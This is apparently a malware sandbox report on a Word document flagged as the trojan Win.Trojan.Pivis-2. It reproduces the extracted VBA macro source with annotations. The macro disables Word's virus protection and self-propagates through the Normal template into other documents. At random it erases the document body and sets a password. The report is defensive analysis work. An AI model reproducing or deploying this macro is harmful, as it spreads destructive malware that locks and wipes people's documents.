Verdict: MALICIOUS
Risk Score: 120

Malware Insights

MITRE ATT&CK: T1059.005 Visual Basic
The file contains VBA macros, specifically a Document_Open macro, a common technique for executing malicious code as soon as a document is opened. The ClamAV detection name 'Win.Trojan.Pivis-2' strongly suggests a trojan payload. The macro code attempts to copy itself to other documents, indicating a self-propagation (infection) mechanism.
Heuristics (3)

| Finding | Severity | Rule | Description |
|---|---|---|---|
| ClamAV: Win.Trojan.Pivis-2 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Win.Trojan.Pivis-2 |
| VBA macros detected (1 related finding) | medium | OLE_VBA_MACROS | Document contains VBA macro code |
| Document_Open macro | high | OLE_VBA_DOCOPEN | Document_Open macro |
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5954 bytes | a7028948b9b6a5771b009881166a8a0cad8cb66f2810434d2b190a1677f40260 |
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub Document_Open()
    On Error Resume Next
    Randomize Timer
    ' Suppress prompts and switch off Word's built-in macro virus warning
    Options.ConfirmConversions = False
    Options.VirusProtection = False
    Options.SaveNormalPrompt = False
    ' Code modules of the global Normal template and of the open document
    Set Normalcl = NormalTemplate.VBProject.VBComponents(1).codemodule
    Set Activecl = ActiveDocument.VBProject.VBComponents(1).codemodule
    ' Normal template not yet infected: copy this document's macro into it
    If Normalcl.countoflines > 0 Then GoTo InfecteerDeHap
    viruscode = Activecl.lines(1, Activecl.countoflines)
    Normalcl.insertlines 1, viruscode
InfecteerDeHap:
    ' Document not yet infected: copy the macro from the Normal template into it and save
    If Activecl.countoflines > 0 Then GoTo Doeii
    viruscode = Normalcl.lines(1, Normalcl.countoflines)
    Activecl.insertlines 1, viruscode
    ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, Fileformat:=wdDocument
Doeii:
    ' Payload triggered by chance: message box, or wipe the document body and set a password
    x = Int(Rnd * 100)
    If x = 11 Then MsgBox "w97.LAM€ by LiFEwiRE [www.shadowvx.org]", , "...::LiFEwiRE::..."
    If x = 25 Then ActiveDocument.Content = "LiFEwiRE2000 - www.shadowvx.org": ActiveDocument.Password = "pietje"
    ' Rewrites module lines 39-43 to define ToolsMacro/ViewVBCode handlers, which
    ' override the corresponding built-in Word menu commands
    With ActiveDocument.VBProject.VBComponents.Item(1).codemodule
        .ReplaceLine 39, "Sub ToolsMacro()"
        .ReplaceLine 40, "'(c) LiFEwiRE 2000"
        .ReplaceLine 42, "Sub ViewVBCode()"
        .ReplaceLine 43, "'www.coderz.net - www.shadowvx.org"
    End With
    '(c) 2OOO by LiFEwiRE... writt3n 4g4inst my phucking 3x-sk3wl... i c4n c0de ring0 p0ly P3 1nf3ct0rs, but w0rd is 4 b3tt3r 't4rg3t in w97... I kn0w this c0d3 w0n't spr34d 0utzide sk3wl, wh0 cares? Th3 b3tt3r!
End Sub

' Infects every new document created from the infected Normal template
Private Sub Document_new()
    Set Normalcl = NormalTemplate.VBProject.VBComponents(1).codemodule
    Set Activecl = ActiveDocument.VBProject.VBComponents(1).codemodule
    viruscode = Normalcl.lines(1, Normalcl.countoflines)
    Activecl.insertlines 1, viruscode
    ActiveDocument.Saved = True
End Sub

' ... (truncated)
```